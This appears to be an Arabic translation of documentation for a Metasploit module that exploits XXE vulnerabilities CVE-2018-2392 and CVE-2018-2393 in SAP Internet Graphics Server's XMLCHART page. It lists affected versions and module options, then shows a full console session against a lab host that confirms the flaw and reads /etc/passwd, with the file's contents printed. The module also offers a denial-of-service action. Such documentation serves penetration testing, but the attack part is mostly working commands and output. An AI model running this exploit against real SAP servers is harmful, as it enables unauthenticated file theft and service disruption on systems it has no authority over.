
هجوم XXE على SAP IGS CVE-2018-2392 وCVE-2018-2393
تستغل هذه الوحدة الثغرتين CVE-2018-2392 و CVE-2018-2393، وهما ثغرتان من نوع XXE داخل صفحة XMLCHART في خوادم SAP Internet Graphics Servers (IGS) التي تعمل بالإصدارات 7.20 أو 7.20EXT أو 7.45 أو 7.49 أو 7.53. وتحدث هاتان الثغرتان نتيجة لغياب التحقق المناسب من وسم Extension HTML عند إرسال طلب POST إلى صفحة XMLCHART لإنشاء مخطط جديد.
سيسمح الاستغلال الناجح للمهاجمين عن بُعد غير المصادق عليهم بقراءة الملفات من الخادم بصلاحية المستخدم الذي يتم تشغيل خدمة IGS به، والذي يكون عادةً مستخدم إدارة SAP. وبدلاً من ذلك، يمكن للمهاجمين أيضًا إساءة استخدام ثغرة XXE لشن هجوم حجب الخدمة (Denial of Service) ضد خادم SAP IGS المعرض للخطر.
توفّر خدمة الرسومات عبر الإنترنت (IGS) بنية تحتية تتيح للمطوّرين عرض الرسومات في متصفح الإنترنت بأقل جهد ممكن. وقد تم دمجها في العديد من تقنيات واجهات مستخدم SAP المختلفة، حيث توفر وسيلة للاستفادة من البيانات القادمة من نظام SAP آخر أو مصدر بيانات آخر لتوليد مخرجات رسومية أو غير رسومية ديناميكية.
يمكن العثور على خطوات تثبيت خادم SAP IGS وتحديثه عبر الإنترنت على هذه الصفحة. يمكن العثور على معلومات إضافية حول تكوين خادم IGS هنا. وأخيرًا، يمكن العثور على معلومات حول إدارة خادم IGS هنا.
بمجرد الإعداد والتكوين، ستكون النسخ معرضة للخطر على منفذ HTTP الافتراضي 40080.
workspace [WORKSPACE]use auxiliary/admin/sap/sap_igs_xmlchart_xxeset RHOSTS [IP]set FILE [remote file name]set action READcheckcheck تحدد بشكل صحيح ما إذا كان الهدف معرضًا للخطر أم لا.runالملف المراد قراءته من الخادم البعيد. مثال: /etc/passwd
هذا هو المسار إلى صفحة XMLCHART الخاصة بخادم SAP IGS المعرضة لثغرة XXE.
افتراضيًا يتم تعيينه إلى /XMLCHART، ومع ذلك يمكن تغييره إذا تم تثبيت خادم SAP IGS
في مسار مختلف عن جذر الويب. على سبيل المثال إذا تم تثبيت خادم SAP IGS
في المسار /igs/ تحت جذر الويب، فسيتم تعيين هذه القيمة إلى /igs/XMLCHART.
Name Description
---- -----------
READ Remote file read
DOS Denial Of Service
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options
Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd no File to read from the remote server
Proxies http:127.0.0.1:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.30.29 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 40080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /XMLCHART yes Path to the SAP IGS XMLCHART page from the web root
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
READ Remote file read
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29
[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.29 40080 tcp http open SAP Internet Graphics Server (IGS)
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2020-10-07 10:12:37 UTC 172.16.30.29 SAP Internet Graphics Server (IGS) XMLCHART XXE CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.30.29 igs.xmlchart.xxe /etc/passwd text/plain SAP IGS XMLCHART XXE /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt


